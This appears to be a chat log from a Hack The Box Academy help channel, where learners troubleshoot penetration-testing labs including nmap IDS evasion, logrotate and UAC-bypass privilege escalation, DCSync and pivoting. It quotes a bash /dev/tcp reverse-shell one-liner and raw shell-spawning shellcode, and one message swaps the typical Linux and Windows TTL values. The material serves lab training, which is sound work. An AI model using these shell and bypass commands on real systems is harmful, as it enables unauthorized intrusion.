sudo nmap 10.129.150.189 -sS -sV -O -f -D RND:3 -T2 -reason --stats-every=10s

while this scan is giving

Nmap scan report for 10.129.150.189 (10.129.150.189)
Host is up, received echo-reply ttl 63 (0.78s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 63 Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
10001/tcp open scp-config? syn-ack ttl 63
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port10001-TCP:V=7.94SVN%I=7%D=10/11%Time=67093205%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,1F,"220\x20HTB{pr0F7pDv3r510nb4nn3r}\r\n");
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: NIX-NMAP-EASY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2373.16 seconds

still no required result for OS

could you please give a look ?

can you link me to the section you're on not sure if ive done this module or not

@x103 ^

https://academy.hackthebox.com/module/19/section/117

ok yeah i dont have access to that module, sorry, not sure i can be of any more specific help than ive already provided, just other than the suggestion of a sanity check, rip all your options out and start checking them one at a time... You're reducing aggressive because the host stops responding (IDS/IPS) no?

yes maybe i can try that and yes i am reducing aggresive due to that

ok any specific reason why you're using an -sS option instead of an -sC?

werrr -sV

nvm, just checked the man page

i get those -s"X" options confused all the time

no nothing specific for sS but sV for proper version scan for services

yea its cool thankyou for the help

--osscan-guess: Guess OS more aggressively

thats from the man page, dunno what "aggressive" means in the IDS/IPS context

liekwise, not sure what "Guess" means either

@eternal vigil one thing you can do is add -vv to your nmap scan and it will generate TTLs and you can get a rough estimate of whether your host is a *nix (TTL=128) or windows (TTL=64) based on TTL response. this prob doesnt help you much as your exercise prob wants the exact OS and/or version

oh yea that might help thankyou

it is linux based as ttl is 63

noice

lmao i brute forced the answer randomly but i NEED TO KNOW how to get to the answer

what is the title of the section?

IDS/IPS evasion lab

Remember, you don't need to provide a version of it. Think about which services can give you information about the operating system. After interviewing the administrators, we found out that they want to prevent neighboring hosts of their /24 subnet mask from communicating with each other.

this was the hint

and as they didn't need a specific version i went for it

can you see solution now that you've solved it?

no i am actually on student subscription

and for that i need a yearly one

oh ok, shucks

was the -d decoy option discussed in the section at all?

yup

only -f was not discussed i believe

did u try -d at all?

i tried it in all the scans and i believe you are are talking about -D decoy

-d is for debugging and it was not discussed

yeah my bad i was reading the very small text on the nmap docs page

there are no writeups or official solutions which i can refer to its really a bummer ngl

someone should be by shortly who has done the module, when they do would you mind DM'ng me the solution im genuinely curious "how htb see's" the solution

oh sure thing i will DM you the soln if someone replies me w it

I've just completed the MSSQL, Exchange and SCCM Attacks module.
Anyone that finished can answer a few questions just for the sake of a sanity check cause I think I did it in an unintended way.

Good Morning. I see that for the pathways, it says it should take X amount of days… but that’s assuming how many hours per day? TIA

Depends.... It may take you more time than that or less... Specially in relation to the Skills Assessments...

hey can you please look into my question too if you got some time ? it would be really helpful .

..

sudo nmap 10.129.150.189 -sS -sV --osscan-guess -vv -D RND:3 -T2 -reason --stats-every=10s

this was my last scan

after this i just went ahead and guessed it but i dont think any of this is the right approach

@gilded latch Really depends. You're gonna be doing a lot of research yourself. The less you know the more you have to catch up on. I've been stuck on an optional exercise for SElinux for like three days simply because I want to understand it. It will likely take longer, especially if you want to be thorough.

wifi pentesting module

You know that one port is opened by the lab description. You can make a version scan to that one port with Nmap. It won't send the requests limit and you won't be blocked.
You could also grab the banner of that service that you know it's running with a cURL command

Module Attacking Authentication Mechanisms, Signature Wrapping Attack, I swear there's something wrong with this module, I do exactly what's asked but I keep getting 'Invalid SAML Response. Not Authenticated.', I take the assertion, remove the signature, update the fields, put it back in the original between response and the original assertion, but to no avail

ohh thankyou very much i will try it later

@quiet trout

So nmap will detect an operating system to a high level of certainly based on a service running on a port? Wish I had access to the module so I could better understand but it just seems to leave too much up in the air... Or does it spit out a few possibilities and you just try them via process of elimination or look for a banner in a curl request... Glad you mentioned that as I had failed to remember that this is a possibility

also @quiet trout dm

I guess if you run a version scan to a service running it will grab you the banner of that service. Not necessarily it will have the information you need.
In this case it does.
I can't remember exactly how I did the module cause it was long ago. But I remember trying to limit my number of requests.
The thing with cURL was just an educated guess due to knowing what port was opened after reading the Lab description and not wanting to get close to the requests limit.

for sure, i often forget about the Server: ... header, revealing some useful info for us, this is pretty handy even if outside the scope and something i hope i dont forget next time an issue like this pops up for me

on the linux priv esc module for the logrotate section: how did you get it to connect to your attacker box? i tried running both the echo "hi" > access.log and the ./logrotten command both as a one liner and seperately

i dont get a connection

Do them on the same line first off

@fathom pendant i did that like 20 times and got nothing, some guy on a forum said he ran them seperately and got it.

Make sure your payload is written properly then

Also you don't need to create a reverse shell with the payload

You can, for example, just cat and read

ive got two payloads one with a .205/9001 and one with a .205:90011

And output it to a file in home

ahh i see

so like cat /flag.txt > /home/htb-student/flag.txt

Also it does take a bit of time sometimes

Also

You need to identify the log file being written to

That's partially why your payload isn't working

Ah nvm checked

i thought it was access.log

because it keeps making new access.log.#

Also your images are spoilers

Yes that's a temp log file

As it writes and rewrites

so the logs im writing to arent the correct ones?

You're writing to the correct one

I rechecked before deleting

Actually you were rewriting it

You weren't appending to the log

> is overwrite
>> is append

oh ok i see

Basics of linux

Hi. Im in the module "windows command line introduction". Im doing the skills assesments. Im trying to connect with ssh to user3 with a password and it says its wrong. The thing is that the password of user3 is the answer to the question using user2 which i got it correct. Idk what is happening

@fathom pendant i changed the payload to cat the flag and redirect it to a file called flag.txt on my home directory. then changed the > to a >>

now its showing there are two backup folders?

guys I swear i am going made

the targets can't load for god's sake

any help please

Reach out to support my guy

Try changing vpn regions

how to reach support ?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

In Intermediate Network Traffic Analys > 802.11 Denial-of-Service the following is stated:
"To enforce users to disconnect from our network, and potentially join their network to retrieve information"

Should it not be "To enforce users to disconnect from ***their ***network, and potentially join our network to retrieve information". Because the attacker is trying to disconnect users from the legitimate network (theirs) and trick them into joining the malicious network (ours).

thank god it worked

thanks guys for the help really appreciate it ❤🌹

Hello everyone ! I have some issues with NoSqli from Skill assessment II. I ve tried so many nosql sintax but idk what i`m missing....

please state the module name and section name so people can help you more easily

Sorry ! Its Senior Web PenTest - Module Introduction to NoSQL Injection, Skill Assessment II.

https://academy.hackthebox.com/module/67/section/626 UAC bypass wont proc the elevated shell

also the flag is directly available to click on from the desktop no UAC bypass needed

the user shell pops using rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll but after using C:\htb> C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe it doesnt pop a shell at all

you can DM me

Hey in the pillaging section i found a sam file but i dont see any hashesh inside it

Is anyone open to dm about the skills assessment of attacking auth mechanisms? Can’t really speak without spoilers

Or potential spoilers I guess

Need some help with the File Inclusion Skill Assessment, I found the vulnerable part of the application. I have fuzzed for non-blacklisted, but I am having issues with finding the correct content type. I keep getting "Only Images allowed", any pointers?

Where are you stuck?

Can I dm?

Sure

Look into file signatures

I see the fuzzing command for content type, it says you do it through Burp, but I just tried and it didn't return anything

you can use intruder to fuzz for content type

That's what I'm trying to do rn, but don't understand how to use it through intruder

DM me and show me the steps you have tried so far

file inclusion?

Sorry File Upload

Any clue on finding cleartext password for an account on targer host in the windows priv esc Miscellaneous techniques

I found a few creds but none worked

try every method shown

why is there no "answer section" when i do, dig inlanefreight.htb @10.129.160.57

What is the module & section by name? You've got to provide additional context for questions.

footprinting, host based enumeration, the DNS part

I'll fire up the lab. I don't have any notes on that section.

I'm pretty sure it's because dig defaults to querying for A records and there are no A records.

I never really considered your line of questioning before, so I had to play with it a little bit

Try querying for another record type, CNAME. You get the same results, no answer section. But other types of queries will provide an answer section when the server can answer.

Furthermore you get an "authority section" because the DNS server is the authoritative server for that domain. As I understand it at least.

I'm not so sure on that last point, you may get an authority section pointing you to the authoritative servers regardless.

no DNS server on target network (i believe) is this the AXFR section if so you'll need to do a dig AXFR or whatever the cmd is

filter carefully for error messages some are diff than others

setspn.exe is available on system with the "AD DS role". This is typically just DC's or is it commonly installed on other systems?

so im on web enumeration, i just tried to use whatweb on my kali vm using the generated ip, but i got a popup on my host machine from my AM saying they blocked a whatweb scanner request. whats going on?

Didn't sound familiar to me. Can you share a screenshot? Maybe there are some details to the message.

ive got a question but i cant type in general chat. is kali purple easy for beginners and can i use with HTB

on my vm i got an error that: ERROR Opening: http://83.136.254.158:43226 - Connection reset by peer
and then on my host it says Web Attack: WhatWeb Scanner Request

@shut vapor

im just overall confused, im connected to the HTB VPN and have a 10.10 ip address, but the ip of the attacking computer was identified as being on my host subnet

See #welcome and follow the instructions to access the whole server. Also you can use any os you'd like.

So it just suggests the connection failed. That target address is public, so it's not accessed through the VPN.

I'm not at my deck so I can't sanity check for you r/n. Can you try through the pwnbox? It's possible something on your end is causing an issue.

is bloodhound's skill assessment just "shortest path from here"?

like
all questions can be solved this way
am i missing something?

tbh bloodhound is all just about shortest path from/to here

its very useful and it does show a lot of other stuff too with cyphers etc

Would it be feasible to set up a kind of honeypot trap where you leave a super vulnerable port open (like ssl or something) and setup code that grabs the attacker’s ip and terminates the connection at the last second?
And if not, why? I’m not very knowledgeable about the subject, and am always open to learning more.

not what this channel is about

maybe ask in #blue-team

<@&861185840277487616>

it is possible, why?you tell us

the idea behind honeypots/nets is usually to let hackers use their tactics in your honeypot to analyze that tactic, so your idea sound kinda counter intuitive since they wouldn't be allowed to do anything

but it could be useful if you only wanna know who is interested in that service but it has to be non common to get something viable ig

Hi guys, anyone wanna do an easy box?

DM

ask in #boxes

Hi, in the footprinting module for SMTP, my "resources" button doesn't do anything, and I cannot access them. How can I rectify this?

try this link https://academy.hackthebox.com/storage/resources/Footprinting-wordlist.zip

Thank you, how do I find these in the future?

idk, it's just on the page for me. try hard refreshing your browser cache (ctrl+shift+r) and make sure to disable any adblockers first

Ctrl shift r worked.

Thank you so much. I've been banging my head on this for 6+ hours now. I checked the forms and I had the correct method and everything.

I thought it was supposed to find the correct/create a word list.

You just broke me out of hell. Thank you.

great glad to hear that fixed it, that clears your browser cache so that was probably the problem

Hello! I am on Windows Privilege Escalation Skills Assessment - Part I and I've been trying to get a reverse shell through command injection but none of the shells I create from reverseshell.com would work. I've used both MSFvenom and Reverse PowerShell #1 and #2. Been stuck for the past 2 days and would greatly appreciate any hints. Thanks!

are you url encoding?

No I havent

welp.. are you trying to do it through a web server?

Yes sir. So encoding is a must?

yeah usually you're going to want to url encode things you send to a web server

Gotcha! Thank you!

well, also depends on how you're sending the payload i guess. if you're doing it through the browser i think that already url encodes it, but if you're using burp or something yeah you'll need to url encode

I was sending it through the browser

it's probably your payload then

they just added a Wi-Fi hacking basics module

so it looks like maybe they are adding more wifi stuff

like in a VPS over the Internet

kind of like WiFi netic but with lessons on Academy

like they literally added a WiFi Hacking Basics Module

https://academy.hackthebox.com/module/details/222

i wonder why no wifi hacking courses i've seen include hcxdumptools

I would imagine the module will be built upon now that we have a solid base.

i'm sure i'll learn a lot, i got it instantly when i saw it.

Nice 🙂

dang the challenges actually have wifi you can play with that's really nice

I need help answering this question so i can move on. But the Wayback machine is down atm

I found the answer online somewhere else but apparently I literally need to copy and paste it in

no answers require a copy/paste you can just type it in

It doesnt work

then it's not the right answer

no idea what module you're on but i googled it and got a different answer so yours doesn't look right to me

Surely

yep not the answer i googled

it'll accept the correct answer so that's probably not it. it doesn't detect if you paste or not, and there's nothing stopping you from putting that in your clipboard and pasting it in, but like i said that doesn't matter.

Its not palm pilot

i don't remember that question and you still didn't say what module or section

one sec

/module/144/section/1256

Information Gathering - Web Edition
Web Archives

idk then they updated the module i completed it before the update

Darn

Hi

Password Attacks > Password Attacks Lab - Hard

i got cmd david and i want transfer .vhd file but i cant (Copy-Item : Access is denied)
any ideas ?

access denied sounds like you don't have permissions

yeah but nvm, i got it from FTP Uploads

What is the name of the last modified file in the "/var/backups" directory?

This question does not have the correct answer

it is not ||apt.extended_states.0|| that is one of the more recent ones but not the most recent

correct answer should be ||dpkg.arch.0||

create a post in #1234357888114364508 for any errors with modules

Hello again! Can someone please tell me what payload should I use on Windows Privilege Escalation Skills Assessment - Part I to get a shell? Literally tried everything and nothing seems to be working.

It really feels like the first modules need a do-over, as someone who is repeating most of them

Just remove the filler introduction as well. Bunch of nonsense to waste the readers time

pretty sure i just used a reveshell.com payload to, i'd double check your settings

I am runing it on Pwnbox

hey guys I'm very lost on this would anyone be able to help? Any help would be appreciated thanks.the section is network services

this is from the passwords attacks module

you probably won't get a response if you don't also include the section

done thanks mate

did you find the user and hash to crack?

Hello, I am very very confused about why my utmp dump is coming back with dates from 1970 and seem to have absolutely nothing to do with the brutus sherlock

what module/section

its a sherlock called brutus

this channel is for academy

try #sherlocks

i see, where should I post?

I dont have access to that channe;

read and follow the directions in #welcome

While trying to follow the tutorial on https://academy.hackthebox.com/module/158/section/1426 I set up the dynamic port forwarding, set up the conf file then ran nmap (proxychains nmap -vv -Pn -sT 172.16.5.19) And it shows that all ports are filtered, unlike the example where I am meant to find some port opens. When I try to RDP using the given credential it works as well but it seems that nmap has an issue. Had similar problem with sshuttle, meterpreter etc. Is that a common problem?

There are open ports.. may need to respawn target or wait 5 mins for the environment to fully boot or something

Been a long time since I've hit the HTB... What are the things I need to do to the get the omniscient rank in 2024 today?

I think the last rank I hit was pro hacker or something of that sort

In "Network Enumeration with Nmap"/ "Evading ids/ips - hard lab" - why i didn't got the banner details if I || intercepted the traffic between the target and attacking host via tcpdump(like shown on the "Service Enumeration" section), after connecting to the target port via nc, it doesn't showing the service version number( htb flag) in Push-ack flag but it showing up service version number( htb flag) in nc. So why the service version is not showing in the push-ack flag like it did on the "service enumeration section"?||

guys i need little help , i need to download nmap scan reports located in pwnbox through apache server , i have connected to academy vpn , yet iam unable to access the apache server .... i have used this command sudo service apache2 start --bind <tun0 ip address> or --bind <ens3 ip address> , yet iam unable to access the apache server , help me out

I waited 10 mins and it is still filtered and no ports are showing up. However I can RDP in it using proxychains + freerdp

hi, i've got a problem in transfering the system file from sam in my attacker host. I'm in module Password Attack, Attacking Sam. The first file are ok, but the last isn't working. already try to restart/switch vpn and terminate ip. Ty

upload it another way or use another tool to download it

😬 ok thanks !

if you're using xfreerdp u can mount a local folder on the machine like this /drive:<name>,<path>

Thanks i'll dig into int !

Hi. I am doing questions during the Linux Fundamentals modules. I am asked What is the path to htb-student's home directory? I put in 'pwd', and it gives me '/home/htb-ac-1526114' but it says it is incorrect. Am I doing something wrong?

the rdp is working too slowly to copy it this way, do you have any other idea ?

you can try the impacket-smbserver and remember to use sudo cuz if u dont the share drive will not let u write data on it

try adding one more backsplash at the end ?! or removing it if u already have

this is a netowrk problem, use pwnbox or restart the machine

Didn't work. Thanks anyway

seems like academy API Attacks is down. The webpage is not loading

|| Think htb-student as a username ||

will try pwnbox, ty !

I have the same issue

I worked out that was using the root flag for the user one

If that helps

hi

If you have access you should be able to evil-winrm and download

You can also use python ftp and powershell

finally the /mount way worked with time, i appreciate a lot all the help you gave me !

it was on my plan too !

Module: File Upload attack
Section: Skill assessment
As seen before, the only place that seems to be a place to 'upload' a file is the ||/contact|| , but it seems to be a GET instead a POST.
I looked at the src code of ||script.js|| in same dir and I still can't understand where does it upload.
Maybe ||XXE|| or ||XXS|| is the answer? though I tried both samples and neither seems to work

Furthermore, from that ||script.js|| i learned that it ||accepts 3 extensions only, so I tried the reverse double php.ext thing, while it still said thanks for feed back, it does nothing than that...||

I have noticed while working on the module labs (right now the Password attacks hard lab), that the target goes offline after a certain time. I spawn the target and use my Kali. Is this expected or is it any way around it? It's kind of annoying, when several steps are involved and the shell suddenly drops, would be nice to be able to keep it alive to complete the lab and not having to redo several steps. This would particulary be applicable further along the line in the course I guess. Thank you for any advice. (So in summary, my question is, how to keep a spawn target alive as long as I want.)

Maybe that button isn’t the answer

Damn I got tunnel visioned again by myself

Wydm? Like the lab is expiring or just stopping randomly

I'm not following - are you saying there is a flag in another Users directory?

Have you looked at the entire picture

Did you get it to work?

Apparently I didn't .
Well I think I am getting it now

well not sure if expiring or dying, but it goes offline. Is that expected that the LAB expires in a certain time?

Yes, usually alive for 90 minutes

You can extend it though

aha, ok, get it, have to remember to extend it when I need to. Do you do that in the same pane, where spawning?

Yeah just have to keep track of it, and yeah it should be right where the spawn button was

I don't remember too well, but I know that there are 2 flags that need to be submitted and I was submitting the wrong one

great, thanks!

Ohk i am come

Ah yes. I got it - Thanks

Vuln Assessment-Nessus Skills Assessment
Can anyone tell me to solve this question how we have to begin?
I cannot understand where we have to start.
there are 2 IP's but don't know on which we have to start enumeration

just commit an authenticated scan as instruction against the target

General question: How does HTTPS help in preventing XSS attacks?

Cookies marked as secure are only transmitted over HTTPS

but in credential table which one i have to choose?

not working tried this many time

they gave you the credentials as htb-student and HTB_@cademy_student!
just select the port/service by the target os type/service open/port open and redo it

it helps mitigate, not necessarily prevent

Any help?

did you try doing a UDP scan?

likely due to timing; this field requires a minimum level of patience my guy

also if one technique doesn't work, use others

there's more than one technique showcased in the IDS/IPS reading

once you figure it out it'll click

I mean i got the flag from the nc but idk why it didn't showed in the tcpdump's intercepted push-ack flag ?

as I said; timings

either way you got the flag, i wouldn't worry too much over it

not every technique is gonna work interchangeably

okay, understandable. Thank you 👍

it's why understanding an array of techniques is important to being successful

fancy tools a master does not make

yodalee

or to rephrase the idiom: A poor carpenter blames his tools

I captured the intercepted packet in a pcap and analyzed with wireshark. Now i can see the banner info in psh-ack flag, thank you.

im working on aen and im getting bloodhound info through ldapsearch->bofhound but when i try to ingest it in bloodhound it is stuck at0%

nxc and bloodhound-python wont do the job and thats why im doing this method instead

anyone else had similar problems? im using bh 4.3.1

Hello everyone I am doing thr dcsync section in active directory module. I want to dump the Reversiable users password but here the file is enpty I have also tried creating new machines instances and also ran as -use-vss parameters it gave rpc error

Hi

Not sure what command you ran but simply using -just-dc flag with secretsdump showed me the cleartext one.

The same command that was taught in the section

Yea I ran that only but it didnt work

I got it to work By changing the flag to -just-dc-user Proxyagent this gave me the cleartext password

https://academy.hackthebox.com/module/110/section/1056 can anyone tell me what im doing wrong in this section. I capture the request set my position as the cookie and use the wordlist mentioned provided as the payload and finally set the payload processing to md5 i run the scan they all come back as 200 OK but visiting all of the sites i dont get the flag

What's the main difference between a staged and stagless msfvenom payload?

without going into much detail -

stageless = simplest, larger, more complexx payload listens on raw socket (nc python, etc.)

staged - more complicated, dropped as an intermediary between the target and a subsequent device which it relies on to receive "the second stage" (rest of the exploit)

peep this https://blog.spookysec.net/stage-v-stageless-1/

Thanks

im not too terribly well versed in it myself but i think the point of staged is to obfuscate, evade, etc., leave no trace

for msfvenom it's simply, stageless: shellcode is in the payload, staged: it gets the shellcode from your msf handler

shellcode?

code responsible for getting you a shell

Oh okay. So the staged payload calls back to the handler to get the shellcode (for example sh -i >& /dev/tcp/10.10.10.10/1234 0>&1)?

"Using the metasploit framework" goes into detail about this

I've been through the module before, it's just been a long time and I wanted to confirm my understanding. Thanks!

uhh the idea is there but shellcodes are not commands, they're simple machine code for the sole purpose of in your case getting a shell

Oh, okay. Noted. Thanks!

whats that website full of shell codes? gosh darn it, memory is failing me at the moment certainly you've seen it

revshells.com? those are commands to create a shell though, not shellcodes

Gosh, its not in my bookmarks, i done fucked up, it was agood link, it was a bunch of known exploits CVEs with shellcode payloads and variations for each

i think it was for use in metasploit specifically

exploit db?

ah yes, the shell codes section of exploit-db

thx @old oasis

well i think this is it, the sites page has changed considerably since i last viewed it

Yeah this is it

@normal sand - have chat gpt decode this for you... classic shellcode \x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 creates a shell on the target system

https://www.exploit-db.com/docs/english/13019-shell-code-for-beginners.pdf

thats short and sweet, some familiarity with c and asm (very little) is needed ot understand it

Hello, guys! I really need your help.
Module: Pivoting, Tunneling, and Port Forwarding: Skill assessment.
Task 4: Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.

First, I tried dynamic ssh port forwarding. I have performed dynamic port forwarding "ssh -D 9050 -i id_rsa webadmin@10.129.x.x and make sure that the port is open on my local host via netstat -tuln. then I make sure that my proxychains.conf is configured correctly and I have "socks4 127.0.0.1 9050" there. but when I tried to enumerate the internal host 172.16.5.35 using "proxychains nmap 172.16.5.35 -Pn -sT", it showed me that there is not a single open port.

After that, I tried to do it with the "Show Solution" from Hack The Box, they did it with meterpreter, so I copied every command completely. I also tried to use the ping_sweep module using meterpreter session and it worked and showed me an internal host. but when I configured the socks proxy, added routes, and then tried to use "proxychains nmap 172.16.5.35 -Pn -sT", it showed me again that no port was open.

What do I need to do?

nmap has its own SOCKS proxy argument that might be worth trying. If you go searching the web for problems with proxychains and nmap, you'll find a few people discussing the issue. I can't say for sure nmap's proxy settings resolve the issue because I haven't gone back to try yet. When proxychains was misbehaving I moved to get a meterpreter session going like you did and then ligolo after that worked well too.

love to know if nmaps option works better though

okay, thanks, will try now

Module: Windows Privilege Escalation
Section: User Account Control
Link to section: https://academy.hackthebox.com/module/67/section/626

I've followed the steps exactly and I was able to get a test connection when I ran just the DLL.

However, when I attempt to run C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe, I do not get a connection. The dll is stored at C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll.

excellent point, also (and im not sure if this comes into play here with proxy chains) you might see about exporting proxy env vars for a session

For example i need to do this when proxying burp thru terminal:

export http_proxy=localhost:8080 export https_proxy=localhost:8080

@worldly badger ^

reply fail @shut vapor ^

Good point. I think you're saying a lot of the system looks to the environ to know if it should use a proxy.

I realized that the problem is not with nmap itself, but probably with proxychains, because I cannot execute a simple "proxychains ping 172.16.5.35".
When I try to execute the same command using a meterpreter session directly from the pivot host, everything is fine and ping requests are executed properly.

I tried to use "export ALL_PROXY=socks4://127.0.0.1:9050" also, but it didn't work. The problem is still not solved

Well, ICMP or UDP won't go through proxychains, only TCP. So the -Pn command will force nmap to scan but the results still come out wacky.

Just use ligolo ng

I'd fire up the lap to play with it if I weren't elsewhere rn

yea, ligolo works real well. I mean, I want to get it working myself because having the option could be useful someday.

and also I'm a little insane when it comes to making computers do what I want or understanding why they won't.